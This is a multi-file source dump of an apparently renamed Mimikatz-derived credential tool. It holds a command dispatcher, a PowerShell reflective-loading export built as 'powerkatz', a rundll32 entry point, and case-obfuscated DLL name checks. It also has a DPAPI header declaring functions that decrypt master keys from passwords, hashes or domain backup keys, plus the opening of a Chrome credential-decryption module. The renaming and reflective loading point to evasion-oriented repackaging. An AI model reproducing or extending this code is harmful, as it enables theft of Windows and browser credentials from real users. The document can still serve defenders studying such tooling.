104 | CoUninitialize();
105 | kull_m_output_file(NULL);
106 | }
107 | return STATUS_SUCCESS;
108 | }
109 |
110 | NTSTATUS sysins_dispatchCommand(wchar_t * input)
111 | {
112 | NTSTATUS status = STATUS_UNSUCCESSFUL;
113 | PWCHAR full;
114 | if(full = kull_m_file_fullPath(input))
115 | {
116 | switch(full[0])
117 | {
118 | default:
119 | status = sysins_doLocal(full);
120 | }
121 | LocalFree(full);
122 | }
123 | return status;
124 | }
125 |
126 | NTSTATUS sysins_doLocal(wchar_t * input)
127 | {
128 | NTSTATUS status = STATUS_SUCCESS;
129 | int argc;
130 | wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
131 | unsigned short indexModule, indexCommand;
132 | BOOL moduleFound = FALSE, commandFound = FALSE;
133 |
134 | if(argv && (argc > 0))
135 | {
136 | if(match = wcsstr(argv[0], L"::"))
137 | {
138 | if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
139 | {
140 | if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))
141 | command = match + 2;
142 | RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
143 | }
144 | }
145 | else command = argv[0];
146 |
147 | for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(sysins_modules)); indexModule++)
148 | if(moduleFound = (!module || (_wcsicmp(module, sysins_modules[indexModule]->shortName) == 0)))
149 | if(command)
150 | for(indexCommand = 0; !commandFound && (indexCommand < sysins_modules[indexModule]->nbCommands); indexCommand++)
151 | if(commandFound = _wcsicmp(command, sysins_modules[indexModule]->commands[indexCommand].command) == 0)
152 | status = sysins_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);
153 |
154 | if(!moduleFound)
155 | {
156 | PRINT_ERROR(L"\"%s\" module not found !\n", module);
157 | for(indexModule = 0; indexModule < ARRAYSIZE(sysins_modules); indexModule++)
158 | {
159 | kprintf(L"\n%16s", sysins_modules[indexModule]->shortName);
160 | if(sysins_modules[indexModule]->fullName)
161 | kprintf(L" - %s", sysins_modules[indexModule]->fullName);
162 | if(sysins_modules[indexModule]->description)
163 | kprintf(L" [%s]", sysins_modules[indexModule]->description);
164 | }
165 | kprintf(L"\n");
166 | }
167 | else if(!commandFound)
168 | {
169 | indexModule -= 1;
170 | PRINT_ERROR(L"\"%s\" command of \"%s\" module not found !\n", command, sysins_modules[indexModule]->shortName);
171 |
172 | kprintf(L"\nModule :\t%s", sysins_modules[indexModule]->shortName);
173 | if(sysins_modules[indexModule]->fullName)
174 | kprintf(L"\nFull name :\t%s", sysins_modules[indexModule]->fullName);
175 | if(sysins_modules[indexModule]->description)
176 | kprintf(L"\nDescription :\t%s", sysins_modules[indexModule]->description);
177 | kprintf(L"\n");
178 |
179 | for(indexCommand = 0; indexCommand < sysins_modules[indexModule]->nbCommands; indexCommand++)
180 | {
181 | kprintf(L"\n%16s", sysins_modules[indexModule]->commands[indexCommand].command);
182 | if(sysins_modules[indexModule]->commands[indexCommand].description)
183 | kprintf(L" - %s", sysins_modules[indexModule]->commands[indexCommand].description);
184 | }
185 | kprintf(L"\n");
186 | }
187 |
188 | if(module)
189 | LocalFree(module);
190 | LocalFree(argv);
191 | }
192 | return status;
193 | }
194 |
195 | #if defined(_POWERKATZ)
196 | __declspec(dllexport) wchar_t * powershell_reflective_sysins(LPCWSTR input)
197 | {
198 | int argc = 0;
199 | wchar_t ** argv;
200 |
201 | if(argv = CommandLineToArgvW(input, &argc))
202 | {
203 | outputBufferElements = 0xff;
204 | outputBufferElementsPosition = 0;
205 | if(outputBuffer = (wchar_t *) LocalAlloc(LPTR, outputBufferElements * sizeof(wchar_t)))
206 | wmain(argc, argv);
207 | LocalFree(argv);
208 | }
209 | return outputBuffer;
210 | }
211 | #endif
212 |
213 | #if defined(_WINDLL)
214 | void CALLBACK sysins_dll(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
215 | {
216 | int argc = 0;
217 | wchar_t ** argv;
218 |
219 | AllocConsole();
220 | #pragma warning(push)
221 | #pragma warning(disable:4996)
222 | freopen("CONOUT$", "w", stdout);
223 | freopen("CONOUT$", "w", stderr);
224 | freopen("CONIN$", "r", stdin);
225 | #pragma warning(pop)
226 | if(lpszCmdLine && lstrlenW(lpszCmdLine))
227 | {
228 | if(argv = CommandLineToArgvW(lpszCmdLine, &argc))
229 | {
230 | wmain(argc, argv);
231 | LocalFree(argv);
232 | }
233 | }
234 | else wmain(0, NULL);
235 | }
236 | #endif
237 |
238 | FARPROC WINAPI delayHookFailureFunc (unsigned int dliNotify, PDelayLoadInfo pdli)
239 | {
240 | if((dliNotify == dliFailLoadLib) && ((_stricmp(pdli->szDll, "ncRYpt.DLl") == 0) || (_stricmp(pdli->szDll, "BcrYPt.dlL") == 0)))
241 | RaiseException(ERROR_DLL_NOT_FOUND, 0, 0, NULL);
242 | return NULL;
243 | }
244 | #if !defined(_DELAY_IMP_VER)
245 | const
246 | #endif
247 | PfnDliHook __pfnDliFailureHook2 = delayHookFailureFunc;
--------------------------------------------------------------------------------
/chexport/chexport.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Release
6 | Win32
7 |
8 |
9 | Release
10 | x64
11 |
12 |
13 | Release
14 | ARM64
15 |
16 |
17 | Second_Release_PowerShell
18 | Win32
19 |
20 |
21 | Second_Release_PowerShell
22 | x64
23 |
24 |
25 | Simple_DLL
26 | Win32
27 |
28 |
29 | Simple_DLL
30 | x64
31 |
32 |
33 | Simple_DLL
34 | ARM64
35 |
36 |
37 |
38 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}
39 | Win32Proj
40 | chexport
41 | Svn
42 | Svn
43 | Svn
44 | SubversionScc
45 | 10.0.17763.0
46 |
47 |
48 |
49 | Application
50 | DynamicLibrary
51 | false
52 | true
53 | Unicode
54 | v100
55 | v110_xp
56 | v120_xp
57 | v140_xp
58 | v141_xp
59 | static
60 |
61 |
62 | ddk2003
63 | false
64 |
65 |
66 | v141
67 | static
68 |
69 |
70 |
71 | $(SolutionDir)$(Platform)\
72 | $(Platform)\
73 | false
74 | $(SolutionDir)inc;$(IncludePath)
75 | $(SolutionDir)lib\$(Platform);$(LibraryPath)
76 | powerkatz
77 |
78 |
79 |
80 | Level3
81 | NotUsing
82 | Full
83 | true
84 | false
85 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
86 | _POWERKATZ;%(PreprocessorDefinitions)
87 | AnySuitable
88 | Size
89 | true
90 | true
91 | false
92 | false
93 | Fast
94 | false
95 | false
96 | None
97 | true
98 |
99 |
100 | Console
101 | false
102 | true
103 | true
104 | advapi32.lib;bcrypt.lib;crypt32.lib;cryptdll.lib;ncrypt.lib;ole32.lib;rpcrt4.lib;shlwapi.lib;shell32.lib;user32.lib;ntdll.min.lib;%(AdditionalDependencies)
105 | false
106 | true
107 | NoErrorReport
108 | false
109 | true
110 | UseLinkTimeCodeGeneration
111 | bcrypt.dll;ncrypt.dll
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 | SQLITE_UNTESTABLE;SQLITE_DISABLE_INTRINSIC;SQLITE_OMIT_LOCALTIME;SQLITE_DQS=0;SQLITE_THREADSAFE=0;SQLITE_DEFAULT_MEMSTATUS=0;SQLITE_DEFAULT_WAL_SYNCHRONOUS=1;SQLITE_LIKE_DOESNT_MATCH_BLOBS;SQLITE_MAX_EXPR_DEPTH=0;SQLITE_OMIT_DECLTYPE;SQLITE_OMIT_DEPRECATED;SQLITE_OMIT_PROGRESS_CALLBACK;SQLITE_OMIT_SHARED_CACHE;SQLITE_USE_ALLOCA;SQLITE_OMIT_OR_OPTIMIZATION;SQLITE_OMIT_LIKE_OPTIMIZATION;SQLITE_OMIT_BETWEEN_OPTIMIZATION;SQLITE_OMIT_TRUNCATE_OPTIMIZATION;SQLITE_OMIT_TCL_VARIABLE;%(PreprocessorDefinitions)
125 | false
126 | Level2
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
--------------------------------------------------------------------------------
/modules/kull_m_dpapi.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_crypto.h"
9 | #include "kull_m_crypto_system.h"
10 | #include "kull_m_string.h"
11 |
12 | const GUID KULL_M_DPAPI_GUID_PROVIDER;
13 |
14 | #define CRYPTPROTECT_SYSTEM 0x20000000
15 |
16 | typedef struct _KULL_M_DWORD_TO_DWORD {
17 | PCWSTR name;
18 | DWORD id;
19 | } KULL_M_DWORD_TO_DWORD, *PKULL_M_DWORD_TO_DWORD;
20 |
21 | #pragma pack(push, 4)
22 | typedef struct _KULL_M_DPAPI_BLOB {
23 | DWORD dwVersion;
24 | GUID guidProvider;
25 | DWORD dwMasterKeyVersion;
26 | GUID guidMasterKey;
27 | DWORD dwFlags;
28 |
29 | DWORD dwDescriptionLen;
30 | PWSTR szDescription;
31 |
32 | ALG_ID algCrypt;
33 | DWORD dwAlgCryptLen;
34 |
35 | DWORD dwSaltLen;
36 | PBYTE pbSalt;
37 |
38 | DWORD dwHmacKeyLen;
39 | PBYTE pbHmackKey;
40 |
41 | ALG_ID algHash;
42 | DWORD dwAlgHashLen;
43 |
44 | DWORD dwHmac2KeyLen;
45 | PBYTE pbHmack2Key;
46 |
47 | DWORD dwDataLen;
48 | PBYTE pbData;
49 |
50 | DWORD dwSignLen;
51 | PBYTE pbSign;
52 | } KULL_M_DPAPI_BLOB, *PKULL_M_DPAPI_BLOB;
53 |
54 | typedef struct _KULL_M_DPAPI_MASTERKEY {
55 | DWORD dwVersion;
56 | BYTE salt[16];
57 | DWORD rounds;
58 | ALG_ID algHash;
59 | ALG_ID algCrypt;
60 | PBYTE pbKey;
61 | DWORD __dwKeyLen;
62 | } KULL_M_DPAPI_MASTERKEY, *PKULL_M_DPAPI_MASTERKEY;
63 |
64 | typedef struct _KULL_M_DPAPI_MASTERKEY_CREDHIST {
65 | DWORD dwVersion;
66 | GUID guid;
67 | } KULL_M_DPAPI_MASTERKEY_CREDHIST, *PKULL_M_DPAPI_MASTERKEY_CREDHIST;
68 |
69 | typedef struct _KULL_M_DPAPI_MASTERKEY_DOMAINKEY {
70 | DWORD dwVersion;
71 | DWORD dwSecretLen;
72 | DWORD dwAccesscheckLen;
73 | GUID guidMasterKey;
74 | PBYTE pbSecret;
75 | PBYTE pbAccesscheck;
76 | } KULL_M_DPAPI_MASTERKEY_DOMAINKEY, *PKULL_M_DPAPI_MASTERKEY_DOMAINKEY;
77 |
78 | typedef struct _KULL_M_DPAPI_MASTERKEYS {
79 | DWORD dwVersion;
80 | DWORD unk0;
81 | DWORD unk1;
82 | WCHAR szGuid[36];
83 | DWORD unk2;
84 | DWORD unk3;
85 | DWORD dwFlags;
86 | DWORD64 dwMasterKeyLen;
87 | DWORD64 dwBackupKeyLen;
88 | DWORD64 dwCredHistLen;
89 | DWORD64 dwDomainKeyLen;
90 | PKULL_M_DPAPI_MASTERKEY MasterKey;
91 | PKULL_M_DPAPI_MASTERKEY BackupKey;
92 | PKULL_M_DPAPI_MASTERKEY_CREDHIST CredHist;
93 | PKULL_M_DPAPI_MASTERKEY_DOMAINKEY DomainKey;
94 | } KULL_M_DPAPI_MASTERKEYS, *PKULL_M_DPAPI_MASTERKEYS;
95 |
96 | typedef struct _KULL_M_DPAPI_DOMAIN_RSA_MASTER_KEY {
97 | DWORD cbMasterKey;
98 | DWORD cbSuppKey;
99 | BYTE buffer[ANYSIZE_ARRAY];
100 | } KULL_M_DPAPI_DOMAIN_RSA_MASTER_KEY, *PKULL_M_DPAPI_DOMAIN_RSA_MASTER_KEY;
101 |
102 | typedef struct _KULL_M_DPAPI_DOMAIN_ACCESS_CHECK {
103 | DWORD dwVersion;
104 | DWORD dataLen;
105 | BYTE data[ANYSIZE_ARRAY];
106 | // sid
107 | // SHA1 (or SHA512)
108 | } KULL_M_DPAPI_DOMAIN_ACCESS_CHECK, *PKULL_M_DPAPI_DOMAIN_ACCESS_CHECK;
109 |
110 | typedef struct _KULL_M_DPAPI_CREDHIST_HEADER {
111 | DWORD dwVersion;
112 | GUID guid;
113 | DWORD dwNextLen;
114 | } KULL_M_DPAPI_CREDHIST_HEADER, *PKULL_M_DPAPI_CREDHIST_HEADER;
115 |
116 | typedef struct _KULL_M_DPAPI_CREDHIST_ENTRY {
117 | KULL_M_DPAPI_CREDHIST_HEADER header;
118 | DWORD dwType; // flags ?
119 | ALG_ID algHash;
120 | DWORD rounds;
121 | DWORD sidLen;
122 | ALG_ID algCrypt;
123 | DWORD sha1Len;
124 | DWORD md4Len;
125 | BYTE salt[16];
126 |
127 | PSID pSid;
128 | PBYTE pSecret;
129 |
130 | DWORD __dwSecretLen;
131 | } KULL_M_DPAPI_CREDHIST_ENTRY, *PKULL_M_DPAPI_CREDHIST_ENTRY;
132 |
133 | typedef struct _KULL_M_DPAPI_CREDHIST {
134 | KULL_M_DPAPI_CREDHIST_HEADER current;
135 | PKULL_M_DPAPI_CREDHIST_ENTRY * entries;
136 | DWORD __dwCount;
137 | } KULL_M_DPAPI_CREDHIST, *PKULL_M_DPAPI_CREDHIST;
138 | #pragma pack(pop)
139 |
140 | PKULL_M_DPAPI_BLOB kull_m_dpapi_blob_create(LPCVOID data/*, DWORD size*/);
141 | void kull_m_dpapi_blob_delete(PKULL_M_DPAPI_BLOB blob);
142 | void kull_m_dpapi_blob_descr(DWORD level, PKULL_M_DPAPI_BLOB blob);
143 | void kull_m_dpapi_blob_quick_descr(DWORD level, LPCVOID data/*, DWORD size*/);
144 |
145 | PKULL_M_DPAPI_MASTERKEYS kull_m_dpapi_masterkeys_create(LPCVOID data/*, DWORD size*/);
146 | void kull_m_dpapi_masterkeys_delete(PKULL_M_DPAPI_MASTERKEYS masterkeys);
147 | void kull_m_dpapi_masterkeys_descr(DWORD level, PKULL_M_DPAPI_MASTERKEYS masterkeys);
148 | PBYTE kull_m_dpapi_masterkeys_tobin(PKULL_M_DPAPI_MASTERKEYS masterkeys, OPTIONAL DWORD64 *size);
149 |
150 | PKULL_M_DPAPI_MASTERKEY kull_m_dpapi_masterkey_create(LPCVOID data, DWORD64 size);
151 | void kull_m_dpapi_masterkey_delete(PKULL_M_DPAPI_MASTERKEY masterkey);
152 | void kull_m_dpapi_masterkey_descr(DWORD level, PKULL_M_DPAPI_MASTERKEY masterkey);
153 | PBYTE kull_m_dpapi_masterkey_tobin(PKULL_M_DPAPI_MASTERKEY masterkey, OPTIONAL DWORD64 *size);
154 |
155 | PKULL_M_DPAPI_MASTERKEY_CREDHIST kull_m_dpapi_masterkeys_credhist_create(LPCVOID data, DWORD64 size);
156 | void kull_m_dpapi_masterkeys_credhist_delete(PKULL_M_DPAPI_MASTERKEY_CREDHIST credhist);
157 | void kull_m_dpapi_masterkeys_credhist_descr(DWORD level, PKULL_M_DPAPI_MASTERKEY_CREDHIST credhist);
158 | PBYTE kull_m_dpapi_masterkeys_credhist_tobin(PKULL_M_DPAPI_MASTERKEY_CREDHIST credhist, OPTIONAL DWORD64 *size);
159 |
160 | PKULL_M_DPAPI_MASTERKEY_DOMAINKEY kull_m_dpapi_masterkeys_domainkey_create(PVOID LPCVOID, DWORD64 size);
161 | void kull_m_dpapi_masterkeys_domainkey_delete(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey);
162 | void kull_m_dpapi_masterkeys_domainkey_descr(DWORD level, PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey);
163 | PBYTE kull_m_dpapi_masterkeys_domainkey_tobin(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, OPTIONAL DWORD64 *size);
164 |
165 | PKULL_M_DPAPI_CREDHIST kull_m_dpapi_credhist_create(LPCVOID data, DWORD size);
166 | void kull_m_dpapi_credhist_delete(PKULL_M_DPAPI_CREDHIST credhist);
167 | void kull_m_dpapi_credhist_descr(DWORD level, PKULL_M_DPAPI_CREDHIST credhist);
168 |
169 | PKULL_M_DPAPI_CREDHIST_ENTRY kull_m_dpapi_credhist_entry_create(LPCVOID data, DWORD size);
170 | void kull_m_dpapi_credhist_entry_delete(PKULL_M_DPAPI_CREDHIST_ENTRY entry);
171 | void kull_m_dpapi_credhist_entry_descr(DWORD level, PKULL_M_DPAPI_CREDHIST_ENTRY entry);
172 |
173 | BOOL kull_m_dpapi_hmac_sha1_incorrect(LPCVOID key, DWORD keyLen, LPCVOID salt, DWORD saltLen, LPCVOID entropy, DWORD entropyLen, LPCVOID data, DWORD dataLen, LPVOID outKey);
174 | BOOL kull_m_dpapi_sessionkey(LPCVOID masterkey, DWORD masterkeyLen, LPCVOID salt, DWORD saltLen, LPCVOID entropy, DWORD entropyLen, LPCVOID data, DWORD dataLen, ALG_ID hashAlg, LPVOID outKey, DWORD outKeyLen);
175 | BOOL kull_m_dpapi_unprotect_blob(PKULL_M_DPAPI_BLOB blob, LPCVOID masterkey, DWORD masterkeyLen, LPCVOID entropy, DWORD entropyLen, LPCWSTR password, LPVOID *dataOut, DWORD *dataOutLen);
176 | BOOL kull_m_dpapi_unprotect_raw_or_blob(LPCVOID pDataIn, DWORD dwDataInLen, LPWSTR *ppszDataDescr, LPCVOID pOptionalEntropy, DWORD dwOptionalEntropyLen, CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct, DWORD dwFlags, LPVOID *pDataOut, DWORD *dwDataOutLen, LPCVOID pMasterKey, DWORD dwMasterKeyLen, LPCWSTR pPassword);
177 |
178 | BOOL kull_m_dpapi_getProtected(PVOID PassHash, DWORD PassLen, PCWSTR sid);
179 | BOOL kull_m_dpapi_unprotect_masterkey_with_password(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR password, PCWSTR sid, BOOL isKeyOfProtectedUser, PVOID *output, DWORD *outputLen);
180 | BOOL kull_m_dpapi_unprotect_masterkey_with_userHash(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID userHash, DWORD userHashLen, PCWSTR sid, BOOL isKeyOfProtectedUser, PVOID *output, DWORD *outputLen);
181 | BOOL kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID shaDerivedkey, DWORD shaDerivedkeyLen, PVOID *output, DWORD *outputLen);
182 |
183 | BOOL kull_m_dpapi_protect_masterkey_with_password(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR password, PCWSTR sid, BOOL isKeyOfProtectedUser, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
184 | BOOL kull_m_dpapi_protect_masterkey_with_userHash(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID userHash, DWORD userHashLen, PCWSTR sid, BOOL isKeyOfProtectedUser, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
185 | BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID shaDerivedkey, DWORD shaDerivedkeyLen, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
186 |
187 | BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen);
188 | BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid);
189 |
190 | BOOL kull_m_dpapi_unprotect_credhist_entry_with_shaDerivedkey(PKULL_M_DPAPI_CREDHIST_ENTRY entry, LPCVOID shaDerivedkey, DWORD shaDerivedkeyLen, PVOID md4hash, PVOID sha1hash);
191 |
192 | void kull_m_dpapi_displayPromptFlags(DWORD flags);
193 | void kull_m_dpapi_displayProtectionFlags(DWORD flags);
194 | void kull_m_dpapi_displayBlobFlags(DWORD flags);
--------------------------------------------------------------------------------
/inc/Midles.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) Microsoft Corporation. All rights reserved.
4 |
5 | Module Name:
6 |
7 | midles.h
8 |
9 | Abstract:
10 |
11 | This module contains definitions needed for encoding/decoding
12 | support (serializing/deserializing a.k.a. pickling).
13 |
14 | --*/
15 |
16 | #ifndef __MIDLES_H__
17 | #define __MIDLES_H__
18 |
19 | #if _MSC_VER > 1000
20 | #pragma once
21 | #endif
22 |
23 | #include
24 |
25 | #ifdef __cplusplus
26 | extern "C" {
27 | #endif
28 |
29 | /*
30 | * Pickling support
31 | */
32 | typedef enum
33 | {
34 | MES_ENCODE,
35 | MES_DECODE,
36 | MES_ENCODE_NDR64
37 | } MIDL_ES_CODE;
38 |
39 | typedef enum
40 | {
41 | MES_INCREMENTAL_HANDLE,
42 | MES_FIXED_BUFFER_HANDLE,
43 | MES_DYNAMIC_BUFFER_HANDLE
44 | } MIDL_ES_HANDLE_STYLE;
45 |
46 |
47 | typedef void (__RPC_USER * MIDL_ES_ALLOC )
48 | ( IN OUT void * state,
49 | OUT char ** pbuffer,
50 | IN OUT unsigned int * psize );
51 |
52 | typedef void (__RPC_USER * MIDL_ES_WRITE)
53 | ( IN OUT void * state,
54 | IN char * buffer,
55 | IN unsigned int size );
56 |
57 | typedef void (__RPC_USER * MIDL_ES_READ)
58 | ( IN OUT void * state,
59 | OUT char ** pbuffer,
60 | IN OUT unsigned int * psize );
61 |
62 | typedef handle_t MIDL_ES_HANDLE;
63 |
64 | typedef struct _MIDL_TYPE_PICKLING_INFO
65 | {
66 | unsigned long Version;
67 | unsigned long Flags;
68 | UINT_PTR Reserved[3];
69 | } MIDL_TYPE_PICKLING_INFO, * PMIDL_TYPE_PICKLING_INFO;
70 |
71 |
72 | RPC_STATUS RPC_ENTRY
73 | MesEncodeIncrementalHandleCreate(
74 | void * UserState,
75 | MIDL_ES_ALLOC AllocFn,
76 | MIDL_ES_WRITE WriteFn,
77 | handle_t * pHandle );
78 |
79 | RPC_STATUS RPC_ENTRY
80 | MesDecodeIncrementalHandleCreate(
81 | void * UserState,
82 | MIDL_ES_READ ReadFn,
83 | handle_t * pHandle );
84 |
85 |
86 | RPC_STATUS RPC_ENTRY
87 | MesIncrementalHandleReset(
88 | handle_t Handle,
89 | void * UserState,
90 | MIDL_ES_ALLOC AllocFn,
91 | MIDL_ES_WRITE WriteFn,
92 | MIDL_ES_READ ReadFn,
93 | MIDL_ES_CODE Operation );
94 |
95 |
96 | RPC_STATUS RPC_ENTRY
97 | MesEncodeFixedBufferHandleCreate(
98 | __out_bcount(BufferSize) char *pBuffer,
99 | __in unsigned long BufferSize,
100 | __out unsigned long *pEncodedSize,
101 | __out handle_t *pHandle
102 | );
103 |
104 | RPC_STATUS RPC_ENTRY
105 | MesEncodeDynBufferHandleCreate(
106 | __deref_out_bcount(*pEncodedSize) char **pBuffer,
107 | __out unsigned long *pEncodedSize,
108 | __out handle_t *pHandle
109 | );
110 |
111 | RPC_STATUS RPC_ENTRY
112 | MesDecodeBufferHandleCreate(
113 | __bcount(BufferSize) char *pBuffer,
114 | __out unsigned long BufferSize,
115 | __out handle_t *pHandle
116 | );
117 |
118 |
119 | RPC_STATUS RPC_ENTRY
120 | MesBufferHandleReset(
121 | __in handle_t Handle,
122 | __in unsigned long HandleStyle,
123 | __in MIDL_ES_CODE Operation,
124 | __deref_in_bcount_opt(BufferSize) char **pBuffer,
125 | __in unsigned long BufferSize,
126 | __out unsigned long *pEncodedSize
127 | );
128 |
129 |
130 | RPC_STATUS RPC_ENTRY
131 | MesHandleFree( handle_t Handle );
132 |
133 | RPC_STATUS RPC_ENTRY
134 | MesInqProcEncodingId(
135 | handle_t Handle,
136 | PRPC_SYNTAX_IDENTIFIER pInterfaceId,
137 | unsigned long * pProcNum );
138 |
139 |
140 | size_t RPC_ENTRY
141 | NdrMesSimpleTypeAlignSize ( handle_t );
142 |
143 | void RPC_ENTRY
144 | NdrMesSimpleTypeDecode(
145 | handle_t Handle,
146 | void * pObject,
147 | short Size );
148 |
149 | void RPC_ENTRY
150 | NdrMesSimpleTypeEncode(
151 | handle_t Handle,
152 | const MIDL_STUB_DESC * pStubDesc,
153 | const void * pObject,
154 | short Size );
155 |
156 |
157 | size_t RPC_ENTRY
158 | NdrMesTypeAlignSize(
159 | handle_t Handle,
160 | const MIDL_STUB_DESC * pStubDesc,
161 | PFORMAT_STRING pFormatString,
162 | const void * pObject );
163 |
164 | void RPC_ENTRY
165 | NdrMesTypeEncode(
166 | handle_t Handle,
167 | const MIDL_STUB_DESC * pStubDesc,
168 | PFORMAT_STRING pFormatString,
169 | const void * pObject );
170 |
171 | void RPC_ENTRY
172 | NdrMesTypeDecode(
173 | handle_t Handle,
174 | const MIDL_STUB_DESC * pStubDesc,
175 | PFORMAT_STRING pFormatString,
176 | void * pObject );
177 |
178 | size_t RPC_ENTRY
179 | NdrMesTypeAlignSize2(
180 | handle_t Handle,
181 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
182 | const MIDL_STUB_DESC * pStubDesc,
183 | PFORMAT_STRING pFormatString,
184 | const void * pObject );
185 |
186 | void RPC_ENTRY
187 | NdrMesTypeEncode2(
188 | handle_t Handle,
189 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
190 | const MIDL_STUB_DESC * pStubDesc,
191 | PFORMAT_STRING pFormatString,
192 | const void * pObject );
193 |
194 | void RPC_ENTRY
195 | NdrMesTypeDecode2(
196 | handle_t Handle,
197 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
198 | const MIDL_STUB_DESC * pStubDesc,
199 | PFORMAT_STRING pFormatString,
200 | void * pObject );
201 |
202 | void RPC_ENTRY
203 | NdrMesTypeFree2(
204 | handle_t Handle,
205 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
206 | const MIDL_STUB_DESC * pStubDesc,
207 | PFORMAT_STRING pFormatString,
208 | void * pObject );
209 |
210 | void RPC_VAR_ENTRY
211 | NdrMesProcEncodeDecode(
212 | handle_t Handle,
213 | const MIDL_STUB_DESC * pStubDesc,
214 | PFORMAT_STRING pFormatString,
215 | ... );
216 |
217 | CLIENT_CALL_RETURN RPC_VAR_ENTRY
218 | NdrMesProcEncodeDecode2(
219 | handle_t Handle,
220 | const MIDL_STUB_DESC * pStubDesc,
221 | PFORMAT_STRING pFormatString,
222 | ...
223 | );
224 |
225 |
226 | // ndr64 entries.
227 | size_t RPC_ENTRY
228 | NdrMesTypeAlignSize3(
229 | handle_t Handle,
230 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
231 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
232 | const unsigned long * ArrTypeOffset[],
233 | unsigned long nTypeIndex,
234 | const void * pObject );
235 |
236 | void RPC_ENTRY
237 | NdrMesTypeEncode3(
238 | handle_t Handle,
239 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
240 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
241 | const unsigned long * ArrTypeOffset[],
242 | unsigned long nTypeIndex,
243 | const void * pObject );
244 |
245 | void RPC_ENTRY
246 | NdrMesTypeDecode3(
247 | handle_t Handle,
248 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
249 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
250 | const unsigned long * ArrTypeOffset[],
251 | unsigned long nTypeIndex,
252 | void * pObject );
253 |
254 | void RPC_ENTRY
255 | NdrMesTypeFree3(
256 | handle_t Handle,
257 | const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
258 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
259 | const unsigned long * ArrTypeOffset[],
260 | unsigned long nTypeIndex,
261 | void * pObject );
262 |
263 |
264 | CLIENT_CALL_RETURN RPC_VAR_ENTRY
265 | NdrMesProcEncodeDecode3(
266 | handle_t Handle,
267 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
268 | unsigned long nProcNum,
269 | void *pReturnValue,
270 | ... );
271 |
272 | void RPC_ENTRY
273 | NdrMesSimpleTypeDecodeAll(
274 | handle_t Handle,
275 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
276 | void * pObject,
277 | short Size );
278 |
279 | void RPC_ENTRY
280 | NdrMesSimpleTypeEncodeAll(
281 | handle_t Handle,
282 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
283 | const void * pObject,
284 | short Size );
285 |
286 | size_t RPC_ENTRY
287 | NdrMesSimpleTypeAlignSizeAll ( handle_t Handle,
288 | const MIDL_STUBLESS_PROXY_INFO* pProxyInfo );
289 |
290 |
291 | #ifdef __cplusplus
292 | }
293 | #endif
294 |
295 | #endif /* __MIDLES_H__ */
296 |
297 |
--------------------------------------------------------------------------------
/chexport/modules/dpapi/packages/kuhl_m_dpapi_chrome.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kuhl_m_dpapi_chrome.h"
7 |
8 | NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[])
9 | {
10 | LPCWSTR infile, szKey;
11 | PSTR aInfile;
12 | int rc;
